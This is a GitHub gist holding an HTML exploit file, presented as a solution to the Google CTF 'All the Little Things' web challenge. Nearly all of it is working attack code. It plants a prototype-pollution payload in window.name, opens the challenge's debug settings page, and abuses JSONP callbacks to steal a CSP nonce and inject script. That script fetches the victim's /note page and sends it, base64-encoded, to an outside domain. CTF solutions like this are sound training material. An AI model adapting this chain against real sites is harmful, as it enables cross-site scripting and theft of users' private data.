Skip to content

Instantly share code, notes, and snippets.

@msrkp

msrkp/exp.html

Created August 24, 2020 01:48
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save msrkp/79c42b0b818fc16b4f05644a6273cf5b to your computer and use it in GitHub Desktop.
Save msrkp/79c42b0b818fc16b4f05644a6273cf5b to your computer and use it in GitHub Desktop.
Download ZIP
Google CTF All the Little Things solution
Raw
exp.html
<!DOCTYPE html>
<html>
<head>
<script>
x= `
<iframe name=x title='fetch(&#x22;/note&#x22;).then(x=>x.text()).then(x=>top.location=&#x22;//ctf.s1r1us.ninja?html=&#x22;+btoa(encodeURIComponent(x)))' id=y srcdoc='<script><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.nonce=top.document.body.lastElementChild.firstElementChild.nextElementSibling.nextElementSibling.nextElementSibling.nonce.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.document.head.lastElementChild.nonce=top.x.nonce.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.document.head.lastElementChild.innerHTML=top.y.title.valueOf ><\/script>'></iframe>
`;
window.name = `{"x": ${JSON.stringify(x)}, "verbose": true, "showAll": true, "keepDebug": true, "__proto__": {"theme":{"cb":"document.body.lastElementChild.previousElementSibling.innerHTML=window.name.valueOf"}}}`;
location = 'https://littlethings.web.ctfcompetition.com/settings?__debug__';
</script>
<body>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment